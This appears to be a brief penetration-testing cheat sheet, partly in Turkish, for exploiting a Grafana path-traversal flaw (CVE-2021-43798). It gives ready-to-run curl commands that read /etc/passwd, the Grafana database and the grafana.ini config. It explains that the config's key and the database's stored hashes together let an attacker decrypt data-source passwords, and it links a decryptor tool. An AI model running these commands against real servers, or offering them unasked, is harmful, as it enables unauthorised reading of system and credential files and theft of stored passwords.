Grafana - 3000

LFI to RCE

curl --path-as-is http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd
curl --path-as-is http://localhost:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db
curl --path-as-is http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/grafana/grafana.ini

• Grafana.ini içinde key grafana.db içinde ise password hash var ikisi ile decrypt ediyoruz.

• Database hash data source tablosunda saklı

Password Decryptor: https://github.com/Sic4rio/Grafana-Decryptor-for-CVE-2021-43798